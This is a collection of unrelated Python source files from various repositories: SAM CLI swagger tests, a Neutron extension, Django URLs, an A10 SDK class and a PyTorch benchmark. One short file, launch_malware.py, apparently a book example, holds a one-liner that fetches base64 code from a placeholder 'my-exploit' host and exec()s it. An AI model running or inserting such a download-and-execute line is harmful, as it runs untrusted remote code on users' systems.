paoptu023/aws-sam-cli
|
e382d603f739e9694d64f622daa228ccfe4581f4
|
[
"Apache-2.0"
] | 1
|
2020-10-14T15:57:07.000Z
|
2020-10-14T15:57:07.000Z
|
"""
Test the swagger parser
"""
from unittest import TestCase
from unittest.mock import patch, Mock
from parameterized import parameterized, param
from samcli.commands.local.lib.swagger.parser import SwaggerParser
from samcli.local.apigw.local_apigw_service import Route
class TestSwaggerParser_get_apis(TestCase):
def test_with_one_path_method(self):
function_name = "myfunction"
swagger = {
"paths": {"/path1": {"get": {"x-amazon-apigateway-integration": {"type": "aws_proxy", "uri": "someuri"}}}}
}
parser = SwaggerParser(swagger)
parser._get_integration_function_name = Mock()
parser._get_integration_function_name.return_value = function_name
expected = [Route(path="/path1", methods=["get"], function_name=function_name)]
result = parser.get_routes()
self.assertEqual(expected, result)
parser._get_integration_function_name.assert_called_with(
{"x-amazon-apigateway-integration": {"type": "aws_proxy", "uri": "someuri"}}
)
def test_with_combination_of_paths_methods(self):
function_name = "myfunction"
swagger = {
"paths": {
"/path1": {
"get": {"x-amazon-apigateway-integration": {"type": "aws_proxy", "uri": "someuri"}},
"delete": {"x-amazon-apigateway-integration": {"type": "aws_proxy", "uri": "someuri"}},
},
"/path2": {"post": {"x-amazon-apigateway-integration": {"type": "aws_proxy", "uri": "someuri"}}},
}
}
parser = SwaggerParser(swagger)
parser._get_integration_function_name = Mock()
parser._get_integration_function_name.return_value = function_name
expected = {
Route(path="/path1", methods=["get"], function_name=function_name),
Route(path="/path1", methods=["delete"], function_name=function_name),
Route(path="/path2", methods=["post"], function_name=function_name),
}
result = parser.get_routes()
self.assertEqual(expected, set(result))
def test_with_any_method(self):
function_name = "myfunction"
swagger = {
"paths": {
"/path1": {
"x-amazon-apigateway-any-method": {
"x-amazon-apigateway-integration": {"type": "aws_proxy", "uri": "someuri"}
}
}
}
}
parser = SwaggerParser(swagger)
parser._get_integration_function_name = Mock()
parser._get_integration_function_name.return_value = function_name
expected = [Route(methods=["ANY"], path="/path1", function_name=function_name)]
result = parser.get_routes()
self.assertEqual(expected, result)
def test_does_not_have_function_name(self):
swagger = {
"paths": {"/path1": {"post": {"x-amazon-apigateway-integration": {"type": "aws_proxy", "uri": "someuri"}}}}
}
parser = SwaggerParser(swagger)
parser._get_integration_function_name = Mock()
parser._get_integration_function_name.return_value = None # Function Name could not be resolved
expected = []
result = parser.get_routes()
self.assertEqual(expected, result)
@parameterized.expand(
[
param("empty swagger", {}),
param("'paths' property is absent", {"foo": "bar"}),
param("no paths", {"paths": {}}),
param("no methods", {"paths": {"/path1": {}}}),
param("no integration", {"paths": {"/path1": {"get": {}}}}),
]
)
def test_invalid_swagger(self, test_case_name, swagger):
parser = SwaggerParser(swagger)
result = parser.get_routes()
expected = []
self.assertEqual(expected, result)
class TestSwaggerParser_get_integration_function_name(TestCase):
@patch("samcli.commands.local.lib.swagger.parser.LambdaUri")
def test_valid_integration(self, LambdaUriMock):
function_name = "name"
LambdaUriMock.get_function_name.return_value = function_name
method_config = {"x-amazon-apigateway-integration": {"type": "aws_proxy", "uri": "someuri"}}
parser = SwaggerParser({})
result = parser._get_integration_function_name(method_config)
self.assertEqual(function_name, result)
LambdaUriMock.get_function_name.assert_called_with("someuri")
@parameterized.expand(
[
param("config is not dict", "myconfig"),
param("integration key is not in config", {"key": "value"}),
param("integration value is empty", {"x-amazon-apigateway-integration": {}}),
param("integration value is not dict", {"x-amazon-apigateway-integration": "someval"}),
param("integration type is not aws_proxy", {"x-amazon-apigateway-integration": {"type": "mock"}}),
param("integration uri is not present", {"x-amazon-apigateway-integration": {"type": "aws_proxy"}}),
]
)
@patch("samcli.commands.local.lib.swagger.parser.LambdaUri")
def test_invalid_integration(self, test_case_name, method_config, LambdaUriMock):
LambdaUriMock.get_function_name.return_value = None
parser = SwaggerParser({})
result = parser._get_integration_function_name(method_config)
self.assertIsNone(result, "must not parse invalid integration")
class TestSwaggerParser_get_binary_media_types(TestCase):
@parameterized.expand(
[
param("Swagger was none", None, []),
param("Swagger is has no binary media types defined", {}, []),
param(
"Swagger define binary media types",
{"x-amazon-apigateway-binary-media-types": ["image/gif", "application/json"]},
["image/gif", "application/json"],
),
]
)
def test_binary_media_type_returned(self, test_case_name, swagger, expected_result):
parser = SwaggerParser(swagger)
self.assertEqual(parser.get_binary_media_types(), expected_result)
| 38.616352
| 119
| 0.619218
|
3cd718c8bf8da2ec682ca1f2a611e0cda21d98ea
| 2,001
|
py
|
Python
|
neutron/extensions/router_availability_zone.py
|
hashsos/hashcloudos-neutron
|
76ec5ca105043be6bf7220b5c5684190ddf14952
|
[
"Apache-2.0"
] | null | null | null |
neutron/extensions/router_availability_zone.py
|
hashsos/hashcloudos-neutron
|
76ec5ca105043be6bf7220b5c5684190ddf14952
|
[
"Apache-2.0"
] | null | null | null |
neutron/extensions/router_availability_zone.py
|
hashsos/hashcloudos-neutron
|
76ec5ca105043be6bf7220b5c5684190ddf14952
|
[
"Apache-2.0"
] | null | null | null |
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
from neutron_lib.api.definitions import availability_zone as az_def
from neutron_lib.api import extensions
import six
EXTENDED_ATTRIBUTES_2_0 = {
'routers': {
az_def.COLLECTION_NAME: {'allow_post': False, 'allow_put': False,
'is_visible': True},
az_def.AZ_HINTS: {
'allow_post': True, 'allow_put': False, 'is_visible': True,
'validate': {'type:availability_zone_hint_list': None},
'default': []}}
}
class Router_availability_zone(extensions.ExtensionDescriptor):
"""Router availability zone extension."""
@classmethod
def get_name(cls):
return "Router Availability Zone"
@classmethod
def get_alias(cls):
return "router_availability_zone"
@classmethod
def get_description(cls):
return "Availability zone support for router."
@classmethod
def get_updated(cls):
return "2015-01-01T10:00:00-00:00"
def get_required_extensions(self):
return ["router", "availability_zone"]
def get_extended_resources(self, version):
if version == "2.0":
return EXTENDED_ATTRIBUTES_2_0
else:
return {}
@six.add_metaclass(abc.ABCMeta)
class RouterAvailabilityZonePluginBase(object):
@abc.abstractmethod
def get_router_availability_zones(self, router):
"""Return availability zones which a router belongs to."""
| 29.426471
| 75
| 0.682659
|
8d690ddf3760b84d66569e09427be9aed65ed103
| 397
|
py
|
Python
|
usr/urls.py
|
exile-co/Bee
|
ad318f8c126ed461659bd8693112644aef3e56ed
|
[
"MIT"
] | null | null | null |
usr/urls.py
|
exile-co/Bee
|
ad318f8c126ed461659bd8693112644aef3e56ed
|
[
"MIT"
] | null | null | null |
usr/urls.py
|
exile-co/Bee
|
ad318f8c126ed461659bd8693112644aef3e56ed
|
[
"MIT"
] | 1
|
2015-11-09T17:01:59.000Z
|
2015-11-09T17:01:59.000Z
|
# -*- encoding: utf8 -*-
from django.conf.urls import patterns, include, url
urlpatterns = patterns('',
# Examples:
url(r'^login/$', 'usr.views.login'),
url(r'^login/do/$', 'usr.views.login_do'),
url(r'^logout/$', 'usr.views.logout'),
url(r'^pass/cambio/$','usr.views.pass_cambio',name='pass_cambio'),
url(r'^add/cliente/$','usr.views.add_cliente',name='add_cliente')
)
| 28.357143
| 70
| 0.629723
|
24251dc39c1095726d0d4f000cf48e3e54cfd096
| 74
|
py
|
Python
|
PyRL/components/stairs.py
|
LordRhys/Game-Development
|
457fd5d791b302800bbefbd2306c08c2fca8518a
|
[
"MIT"
] | null | null | null |
PyRL/components/stairs.py
|
LordRhys/Game-Development
|
457fd5d791b302800bbefbd2306c08c2fca8518a
|
[
"MIT"
] | null | null | null |
PyRL/components/stairs.py
|
LordRhys/Game-Development
|
457fd5d791b302800bbefbd2306c08c2fca8518a
|
[
"MIT"
] | null | null | null |
class Stairs:
def __init__(self, floor):
self.floor = floor
| 12.333333
| 30
| 0.608108
|
3e37acae112be791330f30d1a483fe509f1f3759
| 3,818
|
py
|
Python
|
functions.py
|
doctorblinch/Experts-schedule-planning
|
e42be8ae2a2f0f7e9269924b77d6f2d2650cbd40
|
[
"MIT"
] | null | null | null |
functions.py
|
doctorblinch/Experts-schedule-planning
|
e42be8ae2a2f0f7e9269924b77d6f2d2650cbd40
|
[
"MIT"
] | 3
|
2021-06-08T21:35:38.000Z
|
2022-01-13T02:45:00.000Z
|
functions.py
|
doctorblinch/Experts-schedule-planning
|
e42be8ae2a2f0f7e9269924b77d6f2d2650cbd40
|
[
"MIT"
] | null | null | null |
import random
import os
def configure_height4graph_from_condition(condition):
min_val = min([i[0] for i in condition])
max_val = max([i[1] for i in condition])
height_lines = [[0] * (max_val + 1) for i in range(len(condition))]
new_condition = []
for section in condition:
layer = layer_that_can_be_added(height_lines, section)
new_condition.append((section[0], section[1], layer))
return new_condition
def layer_that_can_be_added(height_lines, value):
start, finish = value
if start != 0:
start -= 1
can_be_added = False
layer = 0
while not can_be_added:
for i in height_lines[layer][start:finish + 1]:
if i == 1:
layer += 1
can_be_added = False
break
else:
can_be_added = True
else:
for i in range(start, finish + 1):
height_lines[layer][i] = 1
return layer
def create_file_with_condition(condition):
names = {name for root, dirs, files in os.walk('data/input_files') for name in files}
available_name_found = False
skeleton = 'condition_{}.csv'
i = 1
while not available_name_found:
if skeleton.format(i) not in names:
available_name_found = True
with open('data/input_files/' + skeleton.format(i), 'w') as f:
for i in condition:
f.write('{},{}\n'.format(i[0], i[1]))
else:
i += 1
def markdown2string(file_path):
with open(file_path, 'r') as f:
string = f.read()
return string
def parse_condition_csv(path):
experts = []
try:
with open(path, 'r') as f:
lines = f.readlines()
for line in lines:
experts.append(
tuple(map(int, line.strip().split(',')))
)
except:
return 'Wrong file format!'
return experts
def generate_random_condition(quantity, min_val, max_val, distribution, max_len):
condition = []
if distribution == 'Усічений нормальний':
for _ in range(quantity):
a = 0
b = 0
while a == b:
a = int(random.normalvariate((max_val + min_val) / 2, (max_val + min_val) / 5))
b = int(random.normalvariate((max_val + min_val) / 2, (max_val + min_val) / 5))
a = max_val if a > max_val else a
a = min_val if a < min_val else a
b = max_val if b > max_val else b
b = min_val if b < min_val else b
a, b = min(a, b), max(a, b)
if b - a > max_len:
delta = int((b - a - max_len) / 2)
b -= delta
a += delta
condition.append((a, b))
elif distribution == 'Рівномірний':
for _ in range(quantity):
a = 0
b = 0
while a == b:
a = random.randint(min_val, max_val - 1)
b = random.randint(min_val + 1, max_val)
a, b = min(a, b), max(a, b)
if b - a > max_len:
delta = int((b - a - max_len) / 2)
b -= delta
a += delta
condition.append((a, b))
elif distribution == 'Рівномірний для відрізків обмеженної довжини':
for _ in range(quantity):
a = random.randint(min_val, max_val - 1)
b = a + random.randint(1, max_len)
b = max_val if b > max_val else b
condition.append((a, b))
return condition
# EXPERTS = [(1, 14), (2, 7), (7, 16), (14, 22), (18, 28), (25, 30), (28, 35), (30, 34), (34, 40)]
# EXPERTS = [(2, 4), (2, 4), (5, 7), (2, 4)]
# print(configure_height4graph_from_condition(EXPERTS))
| 30.790323
| 98
| 0.51912
|
113e7d0c353257ef8ea9ed15f58d280b757b78ae
| 15,560
|
py
|
Python
|
a10sdk/core/gslb/gslb_zone_service.py
|
deepfield/a10sdk-python
|
bfaa58099f51f085d5e91652d1d1a3fd5c529d5d
|
[
"Apache-2.0"
] | 16
|
2015-05-20T07:26:30.000Z
|
2021-01-23T11:56:57.000Z
|
a10sdk/core/gslb/gslb_zone_service.py
|
deepfield/a10sdk-python
|
bfaa58099f51f085d5e91652d1d1a3fd5c529d5d
|
[
"Apache-2.0"
] | 6
|
2015-03-24T22:07:11.000Z
|
2017-03-28T21:31:18.000Z
|
a10sdk/core/gslb/gslb_zone_service.py
|
deepfield/a10sdk-python
|
bfaa58099f51f085d5e91652d1d1a3fd5c529d5d
|
[
"Apache-2.0"
] | 23
|
2015-03-29T15:43:01.000Z
|
2021-06-02T17:12:01.000Z
|
from a10sdk.common.A10BaseClass import A10BaseClass
class HealthCheckPort(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param health_check_port: {"description": "Check Related Port Status (Port Number)", "minimum": 0, "type": "number", "maximum": 65534, "format": "number"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "health-check-port"
self.DeviceProxy = ""
self.health_check_port = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class SamplingEnable(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param counters1: {"enum": ["all", "received-query", "sent-response", "proxy-mode-response", "cache-mode-response", "server-mode-response", "sticky-mode-response", "backup-mode-response"], "type": "string", "description": "'all': all; 'received-query': Number of DNS queries received for the service; 'sent-response': Number of DNS replies sent to clients for the service; 'proxy-mode-response': Number of DNS replies sent to clients by the ACOS device as a DNS proxy for the service; 'cache-mode-response': Number of cached DNS replies sent to clients by the ACOS device for the service. (This statistic applies only if the DNS cache; 'server-mode-response': Number of DNS replies sent to clients by the ACOS device as a DNS server for the service. (This statistic applies only if the D; 'sticky-mode-response': Number of DNS replies sent to clients by the ACOS device to keep the clients on the same site. (This statistic applies only if; 'backup-mode-response': help Number of DNS replies sent to clients by the ACOS device in backup mode; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "sampling-enable"
self.DeviceProxy = ""
self.counters1 = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Service(A10BaseClass):
"""Class Description::
Service information for the GSLB zone.
Class service supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
:param forward_type: {"optional": true, "enum": ["both", "query", "response"], "type": "string", "description": "'both': Forward both query and response; 'query': Forward query; 'response': Forward response; ", "format": "enum"}
:param uuid: {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}
:param health_check_port: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"optional": true, "health-check-port": {"description": "Check Related Port Status (Port Number)", "minimum": 0, "type": "number", "maximum": 65534, "format": "number"}}}]}
:param policy: {"description": "Specify policy for this service (Specify policy name)", "format": "string", "minLength": 1, "maxLength": 63, "optional": true, "default-depends-on": "gslb.zone::policy", "type": "string"}
:param dns_txt_record_list: {"minItems": 1, "items": {"type": "dns-txt-record"}, "uniqueItems": true, "array": [{"required": ["record-name"], "properties": {"uuid": {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}, "record-name": {"description": "Specify the Object Name for TXT Data", "format": "string", "minLength": 1, "optional": false, "maxLength": 63, "type": "string"}, "txt-data": {"description": "Specify TXT Data", "format": "string-rlx", "minLength": 1, "optional": true, "maxLength": 1000, "type": "string"}, "ttl": {"description": "Specify TTL", "format": "number", "default": 0, "optional": true, "maximum": 2147483647, "minimum": 0, "type": "number"}}}], "type": "array", "$ref": "/axapi/v3/gslb/zone/{name}/service/{service-port}+{service-name}/dns-txt-record/{record-name}"}
:param service_port: {"description": "Port number of the service", "format": "number", "type": "number", "maximum": 65534, "minimum": 0, "optional": false}
:param dns_mx_record_list: {"minItems": 1, "items": {"type": "dns-mx-record"}, "uniqueItems": true, "array": [{"required": ["mx-name"], "properties": {"priority": {"description": "Specify Priority", "format": "number", "type": "number", "maximum": 65535, "minimum": 0, "optional": true}, "uuid": {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}, "mx-name": {"description": "Specify Domain Name", "format": "string", "minLength": 1, "optional": false, "maxLength": 127, "type": "string"}, "ttl": {"description": "Specify TTL", "format": "number", "default": 0, "optional": true, "maximum": 2147483647, "minimum": 0, "type": "number"}}}], "type": "array", "$ref": "/axapi/v3/gslb/zone/{name}/service/{service-port}+{service-name}/dns-mx-record/{mx-name}"}
:param dns_record_list: {"minItems": 1, "items": {"type": "dns-record"}, "uniqueItems": true, "array": [{"required": ["type"], "properties": {"data": {"description": "Specify DNS Data", "format": "string-rlx", "minLength": 1, "optional": true, "maxLength": 512, "type": "string"}, "type": {"description": "Specify DNS Type", "format": "number", "type": "number", "maximum": 65535, "minimum": 1, "optional": false}, "uuid": {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}}}], "type": "array", "$ref": "/axapi/v3/gslb/zone/{name}/service/{service-port}+{service-name}/dns-record/{type}"}
:param dns_ns_record_list: {"minItems": 1, "items": {"type": "dns-ns-record"}, "uniqueItems": true, "array": [{"required": ["ns-name"], "properties": {"sampling-enable": {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"optional": true, "counters1": {"enum": ["all", "hits"], "type": "string", "description": "'all': all; 'hits': Number of times the record has been used; ", "format": "enum"}}}]}, "ns-name": {"description": "Specify Domain Name", "format": "string", "minLength": 1, "optional": false, "maxLength": 127, "type": "string"}, "uuid": {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}, "ttl": {"description": "Specify TTL", "format": "number", "default": 0, "optional": true, "maximum": 2147483647, "minimum": 0, "type": "number"}}}], "type": "array", "$ref": "/axapi/v3/gslb/zone/{name}/service/{service-port}+{service-name}/dns-ns-record/{ns-name}"}
:param health_check_gateway: {"description": "'enable': Enable Gateway Status Check; 'disable': Disable Gateway Status Check; ", "format": "enum", "default": "enable", "type": "string", "enum": ["enable", "disable"], "optional": true}
:param sampling_enable: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"optional": true, "counters1": {"enum": ["all", "received-query", "sent-response", "proxy-mode-response", "cache-mode-response", "server-mode-response", "sticky-mode-response", "backup-mode-response"], "type": "string", "description": "'all': all; 'received-query': Number of DNS queries received for the service; 'sent-response': Number of DNS replies sent to clients for the service; 'proxy-mode-response': Number of DNS replies sent to clients by the ACOS device as a DNS proxy for the service; 'cache-mode-response': Number of cached DNS replies sent to clients by the ACOS device for the service. (This statistic applies only if the DNS cache; 'server-mode-response': Number of DNS replies sent to clients by the ACOS device as a DNS server for the service. (This statistic applies only if the D; 'sticky-mode-response': Number of DNS replies sent to clients by the ACOS device to keep the clients on the same site. (This statistic applies only if; 'backup-mode-response': help Number of DNS replies sent to clients by the ACOS device in backup mode; ", "format": "enum"}}}]}
:param disable: {"default": 0, "optional": true, "type": "number", "description": "Disable", "format": "flag"}
:param dns_srv_record_list: {"minItems": 1, "items": {"type": "dns-srv-record"}, "uniqueItems": true, "array": [{"required": ["srv-name", "port"], "properties": {"srv-name": {"description": "Specify Domain Name", "format": "string", "minLength": 1, "optional": false, "maxLength": 127, "type": "string"}, "uuid": {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}, "weight": {"description": "Specify Weight, default is 10", "format": "number", "default": 10, "optional": true, "maximum": 100, "minimum": 1, "type": "number"}, "priority": {"description": "Specify Priority", "format": "number", "type": "number", "maximum": 65535, "minimum": 0, "optional": true}, "ttl": {"description": "Specify TTL", "format": "number", "type": "number", "maximum": 2147483647, "minimum": 0, "optional": true}, "port": {"description": "Specify Port (Port Number)", "format": "number", "type": "number", "maximum": 65534, "minimum": 0, "optional": false}}}], "type": "array", "$ref": "/axapi/v3/gslb/zone/{name}/service/{service-port}+{service-name}/dns-srv-record/{srv-name}+{port}"}
:param service_name: {"description": "Specify the service name for the zone, * for wildcard", "format": "string-rlx", "minLength": 1, "optional": false, "maxLength": 63, "type": "string"}
:param action: {"optional": true, "enum": ["drop", "forward", "ignore", "reject"], "type": "string", "description": "'drop': Drop query; 'forward': Forward packet; 'ignore': Send empty response; 'reject': Send refuse response; ", "format": "enum"}
:param dns_ptr_record_list: {"minItems": 1, "items": {"type": "dns-ptr-record"}, "uniqueItems": true, "array": [{"required": ["ptr-name"], "properties": {"ptr-name": {"description": "Specify Domain Name", "format": "string", "minLength": 1, "optional": false, "maxLength": 127, "type": "string"}, "sampling-enable": {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"optional": true, "counters1": {"enum": ["all", "hits"], "type": "string", "description": "'all': all; 'hits': Number of times the record has been used; ", "format": "enum"}}}]}, "uuid": {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}, "ttl": {"description": "Specify TTL", "format": "number", "default": 0, "optional": true, "maximum": 2147483647, "minimum": 0, "type": "number"}}}], "type": "array", "$ref": "/axapi/v3/gslb/zone/{name}/service/{service-port}+{service-name}/dns-ptr-record/{ptr-name}"}
:param dns_cname_record_list: {"minItems": 1, "items": {"type": "dns-cname-record"}, "uniqueItems": true, "array": [{"required": ["alias-name"], "properties": {"as-backup": {"default": 0, "optional": true, "type": "number", "description": "As backup when fail", "format": "flag"}, "alias-name": {"description": "Specify the alias name", "format": "string", "minLength": 1, "optional": false, "maxLength": 127, "type": "string"}, "admin-preference": {"description": "Specify Administrative Preference, default is 100", "format": "number", "default": 100, "optional": true, "maximum": 255, "minimum": 0, "type": "number"}, "weight": {"description": "Specify Weight, default is 1", "format": "number", "default": 1, "optional": true, "maximum": 100, "minimum": 1, "type": "number"}, "uuid": {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}}}], "type": "array", "$ref": "/axapi/v3/gslb/zone/{name}/service/{service-port}+{service-name}/dns-cname-record/{alias-name}"}
:param geo_location_list: {"minItems": 1, "items": {"type": "geo-location"}, "uniqueItems": true, "array": [{"required": ["geo-name"], "properties": {"forward-type": {"optional": true, "enum": ["both", "query", "response"], "type": "string", "description": "'both': Forward both query and response; 'query': Forward query from this geo-location; 'response': Forward response to this geo-location; ", "format": "enum"}, "uuid": {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}, "alias": {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"alias": {"minLength": 1, "maxLength": 127, "type": "string", "description": "Send CNAME response for this geo-location (Specify a CNAME record)", "format": "string"}, "optional": true}}]}, "action-type": {"optional": true, "enum": ["allow", "drop", "forward", "ignore", "reject"], "type": "string", "description": "'allow': Allow query from this geo-location; 'drop': Drop query from this geo-location; 'forward': Forward packet for this geo-location; 'ignore': Send empty response to this geo-location; 'reject': Send refuse response to this geo-location; ", "format": "enum"}, "policy": {"description": "Policy for this geo-location (Specify the policy name)", "format": "string", "minLength": 1, "optional": true, "maxLength": 63, "not": "action", "type": "string"}, "action": {"description": "Action for this geo-location", "format": "flag", "default": 0, "optional": true, "not": "policy", "type": "number"}, "geo-name": {"description": "Specify the geo-location", "format": "string", "minLength": 1, "optional": false, "maxLength": 127, "type": "string"}}}], "type": "array", "$ref": "/axapi/v3/gslb/zone/{name}/service/{service-port}+{service-name}/geo-location/{geo-name}"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/gslb/zone/{name}/service/{service_port}+{service_name}`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required = [ "service_port","service_name"]
self.b_key = "service"
self.a10_url="/axapi/v3/gslb/zone/{name}/service/{service_port}+{service_name}"
self.DeviceProxy = ""
self.dns_a_record = {}
self.forward_type = ""
self.uuid = ""
self.health_check_port = []
self.policy = ""
self.dns_txt_record_list = []
self.service_port = ""
self.dns_mx_record_list = []
self.dns_record_list = []
self.dns_ns_record_list = []
self.health_check_gateway = ""
self.sampling_enable = []
self.disable = ""
self.dns_srv_record_list = []
self.service_name = ""
self.action = ""
self.dns_ptr_record_list = []
self.dns_cname_record_list = []
self.geo_location_list = []
for keys, value in kwargs.items():
setattr(self,keys, value)
| 134.137931
| 1,884
| 0.650514
|
63f157f611a0334f7d417fea677663af928b2695
| 145
|
py
|
Python
|
Chapter08/launch_malware.py
|
PacktPublishing/Secret-Recipes-of-the-Python-Ninja
|
805d00c7a54927ba94c9077e9a580508ee3c5e56
|
[
"MIT"
] | 13
|
2018-06-21T01:44:49.000Z
|
2021-12-01T10:49:53.000Z
|
Chapter08/launch_malware.py
|
PacktPublishing/Secret-Recipes-of-the-Python-Ninja
|
805d00c7a54927ba94c9077e9a580508ee3c5e56
|
[
"MIT"
] | null | null | null |
Chapter08/launch_malware.py
|
PacktPublishing/Secret-Recipes-of-the-Python-Ninja
|
805d00c7a54927ba94c9077e9a580508ee3c5e56
|
[
"MIT"
] | 6
|
2018-10-05T08:29:24.000Z
|
2022-01-11T14:49:50.000Z
|
python -c "import urllib.request, base64;
exec(base64.b64decode(
urllib.request.urlopen('http://my-exploit/py.b64')
).decode())"
| 29
| 58
| 0.655172
|
198846de8598e9f7e25c7f8350f8a990e12a8397
| 1,629
|
py
|
Python
|
examples/benchmarks/pytorch_cnn.py
|
yangpanMS/superbenchmark
|
4d85630abba0fe45b8cd3a51e79c15e6ac87a1e6
|
[
"MIT"
] | 59
|
2021-04-12T09:44:23.000Z
|
2022-03-27T14:33:46.000Z
|
examples/benchmarks/pytorch_cnn.py
|
yangpanMS/superbenchmark
|
4d85630abba0fe45b8cd3a51e79c15e6ac87a1e6
|
[
"MIT"
] | 275
|
2021-03-29T06:40:34.000Z
|
2022-03-30T07:35:49.000Z
|
examples/benchmarks/pytorch_cnn.py
|
yangpanMS/superbenchmark
|
4d85630abba0fe45b8cd3a51e79c15e6ac87a1e6
|
[
"MIT"
] | 24
|
2021-04-09T12:42:27.000Z
|
2022-03-16T08:26:34.000Z
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
"""Model benchmark example for CNN models.
Commands to run:
python3 examples/benchmarks/pytorch_cnn.py (Single GPU)
python3 -m torch.distributed.launch --use_env --nproc_per_node=8 examples/benchmarks/pytorch_cnn.py \
--distributed (Distributed)
"""
import argparse
from superbench.benchmarks import Platform, Framework, BenchmarkRegistry
from superbench.common.utils import logger
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--distributed', action='store_true', default=False, help='Whether to enable distributed training.'
)
args = parser.parse_args()
# Specify the model name and benchmark parameters.
# For example, resnet50, resnet101, resnet152, densenet169, densenet201, vgg11, vgg13, vgg16, vgg19.
model_name = 'resnet101'
parameters = '--batch_size 192 --precision float32 float16 --num_warmup 64 --num_steps 512 \
--sample_count 8192 --pin_memory'
if args.distributed:
parameters += ' --distributed_impl ddp --distributed_backend nccl'
# Create context for resnet101 benchmark and run it for 2048 steps.
context = BenchmarkRegistry.create_benchmark_context(
model_name, platform=Platform.CUDA, parameters=parameters, framework=Framework.PYTORCH
)
benchmark = BenchmarkRegistry.launch_benchmark(context)
if benchmark:
logger.info(
'benchmark: {}, return code: {}, result: {}'.format(
benchmark.name, benchmark.return_code, benchmark.result
)
)
| 36.2
| 107
| 0.711479
|
315b2db44b7d2b3607c5822a15c032a0d0d4de66
| 878
|
py
|
Python
|
app/test.py
|
GuilhermeJC13/storIA
|
eeecbe9030426f70c6aa73ca0ce8382860c8495c
|
[
"MIT"
] | 4
|
2021-07-27T23:39:02.000Z
|
2021-09-23T04:17:08.000Z
|
app/test.py
|
GuilhermeJC13/storIA
|
eeecbe9030426f70c6aa73ca0ce8382860c8495c
|
[
"MIT"
] | null | null | null |
app/test.py
|
GuilhermeJC13/storIA
|
eeecbe9030426f70c6aa73ca0ce8382860c8495c
|
[
"MIT"
] | 3
|
2021-07-27T17:33:58.000Z
|
2021-07-29T12:46:59.000Z
|
import requests
API_URL = "https://api-inference.huggingface.co/models/Felipehonorato/storIA"
headers = {"Authorization": "Bearer api_CwzaLVoNBMVQhviuBtnxxdVoXvQgjuTEmW"}
def remove_token(text):
return " ".join(text.split()[1:])
def check_token(input):
token = '<|startoftext|> '
if input.split()[0] != token:
return token + input
else:
return input
def query(payload):
response = requests.post(API_URL, headers=headers, json=payload)
return response.json()
input = 'it was a dark night' # TEXTO DO USUÁRIO
input_len = len(input.split())
size = 50 # DEFINIDO PELO USUÁRIO DEFAULT 50
input = check_token(input)
output = query({"inputs": input,
"parameters": {"max_length": 50, 'repetition_penalty': float(1.2), 'num_beams':5,
'no_repeat_ngram_size':3, 'max_length':input_len + size}})
| 33.769231
| 98
| 0.664009
|
1239c5d3f5872e98ab9312ec109c802e090c4906
| 2,256
|
py
|
Python
|
tests/controllers/test_citation_controller.py
|
Medisur/journalmanagement
|
bc356e8d3354529a14a5e04bec3d80c03ed1c0ec
|
[
"MIT"
] | 1
|
2019-04-16T08:53:16.000Z
|
2019-04-16T08:53:16.000Z
|
tests/controllers/test_citation_controller.py
|
Medisur/journalmanagement
|
bc356e8d3354529a14a5e04bec3d80c03ed1c0ec
|
[
"MIT"
] | null | null | null |
tests/controllers/test_citation_controller.py
|
Medisur/journalmanagement
|
bc356e8d3354529a14a5e04bec3d80c03ed1c0ec
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from gluon.html import URL
from gluon.storage import Storage
import json
def dict_to_storage(dictionary):
"""
Converts recursively a dictionary to a storage object
"""
new_storage = Storage(dictionary)
def list_dicts_to_storage(st_list):
for i, a in enumerate(st_list):
if isinstance(a,list):
st_list[i] = list_dicts_to_storage(a)
elif isinstance(a,dict):
st_list[i] = dict_to_storage(a)
return st_list
for key in new_storage:
if isinstance(new_storage[key],dict):
new_storage[key] = dict_to_storage(new_storage[key])
